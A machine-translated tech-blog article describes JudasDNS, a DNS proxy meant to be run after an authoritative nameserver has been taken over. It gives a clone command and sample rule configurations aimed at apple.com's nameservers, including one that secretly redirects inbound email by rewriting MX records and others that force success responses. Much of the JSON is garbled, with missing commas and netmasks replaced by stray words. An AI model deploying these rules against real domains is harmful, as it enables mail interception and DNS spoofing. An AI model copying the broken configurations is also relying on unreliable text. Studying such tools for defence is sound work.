Shulou(Shulou.com)05/31 Report--

This article will explain what tool JudasDNS is for you in detail. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

JudasDNS is a security testing tool for DNS domain name server. With the help of JudasDNS, the majority of security researchers can easily test the target domain name server with DNS poisoning attack to ensure the security of the domain name server.

JudasDNS can help researchers build and deploy DNS proxy servers and replace domain name servers that have been taken over to perform target attacks. JudasDNS can represent all DNS query requests of a legitimate domain name server of a domain name. The rule configuration of JudasDNS allows us to modify the DNS response according to the source IP or DNS query type, which means that the attacker can configure a malicious domain name server to achieve this: selectively reroute inbound emails from a specified source IP address range (through modified MX records) and set TTL with very long data length Or perform attacks such as DNS cache poisoning.

Tool download

Run the following command to clone the project source code directly to the local area:

Git clone https://github.com/mandatoryprogrammer/JudasDNS.git

How to use JudasDNS

The following is the sample configuration code of JudasDNS for the test sample scenario, in which we have acquired or taken over an authoritative domain name server (apple.com) of Apple:

{"version": "1.0.0", "port": 2248, "dns_query_timeout": 10000, "target_nameservers": ["17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151" "17.151.0.152"], "rules": [{"name": "Secretly redirect all emails coming from 127.0.0.1!", "query_type_matches": ["MX"], "ip_range_matches": ["127.0.0.1 Secretly redirect all emails coming from 32"] "modifications": [{"answer": [{"name": "apple.com", "type": 15, "class": 1 "ttl": 10, "priority": 10, "exchange": "hacktheplace.localhost"}]} {"name": "Make all responses NOERROR even if they've failed.", "query_type_matches": ["*"] "modifications": [{"header": {"rcode": 0}}]}} configuration parameter value resolution

1. Version: configuration file format version (currently 1.0.0)

2. The running port of port:Judas

3. Dns_query_timeout: how long to wait before abandoning the reply from the upstream target name server (milliseconds)

4. Target_nameservers: the legitimate domain name server of the target domain name, from which all DNS queries will be issued by Judas on behalf of all requesting clients

5. Rules: list of rules that modify the DNS response

6. Name: the name of a given rule

7. Query_type_matches: a list of query types to be matched, such as CNAME, A record, etc. You can also use * wildcards to match any type of query type

8. Ip_range_matches: a list of IP ranges to be matched, which is used to selectively spoof attacks on the response of a specific range of IP

9. Modifications: view the "Modifications" data segment of README

Modifications

JudasDNS's rules provide the modifications specification, which helps us identify what changes have been made to the DNS response before it is sent back to the client. Before we modify the response content, we also need to look at the DNS node documentation to understand the DNS response structure.

Here is a sample of the DNS response format:

{header: {id: 25373, qr: 1, opcode: 0, aa: 1, tc: 0, rd: 1, ra: 0, res1: 0, res2: 0, res3: 0, rcode: 5}, question: [{name: 'apple.com', type: 2, class: 1}], answer: [{name:' apple.com', type: 2, class: 1 Ttl: 86400, data: 'nserver2.apple.com'}, {name:' apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver4.apple.com'}, {name:' apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver.apple.com'} {name: 'apple.com', type: 2, class: 1, ttl: 86400, data:' nserver3.apple.com'}, {name: 'apple.com', type: 2, class: 1, ttl: 86400, data:' nserver5.apple.com'}, {name: 'apple.com', type: 2, class: 1 Ttl: 86400, data: 'nserver6.apple.com'}, {name:' apple.com', type: 2, class: 1, ttl: 86400, data: 'adns2.apple.com'}, {name:' apple.com', type: 2, class: 1, ttl: 86400, data: 'adns1.apple.com'}], authority: [] Additional: [], edns_options: [], payload: undefined, address: undefined,...trimmed for brevity...

Note: for more information about the DNS response data structure, you can check out [this document].

Writing a modifications rule is very simple. Here is a set of sample rules:

{"name": "Make all responses NOERROR even if they've failed.", "query_type_matches": ["*"], "modifications": [{"header": {"rcode": 0}}]}

The above rules can match any type of query request and set the header.rcode value in the DNS response to 0. 0.

Here is another sample rule for your reference:

{"name": "Secretly redirect all emails coming from 127.0.0.1!", "query_type_matches": ["MX"], "ip_range_matches": ["127.0.0.1 class 32"], "modifications": [{"answer": [{"name": "apple.com", "type": 15, "class": 1 "ttl": 10, "priority": 10, "exchange": "hacktheplace.localhost"}]}} Rule matching type requestor IP

The following rules match the IP address of a client:

{"name": "Make all responses requested from localhost (127.0.0.1) NOERROR.", "ip_range_matches": ["127.0.0.1 NOERROR 32"], "modifications": [{"header": {"rcode": 0}}]} request query type

The following rules match the query types MX and CNAME, and apply the corresponding modification rules:

{"name": "Make all responses NOERROR even if they've failed.", "query_type_matches": ["MX", "CNAME"], "modifications": [{"header": {"rcode": 0}}]} response status code

The following rules can match the response code of NXDOMAIN and apply the corresponding modification rules:

{"name": "Make all responses requested from localhost (127.0.0.1) NOERROR.", "response_code_matches": ["NXDOMAIN"], "modifications": [{"header": {"rcode": 0}}]} this is the end of the article on "what is JudasDNS". I hope the above content can be of some help to you. So that you can learn more knowledge, if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.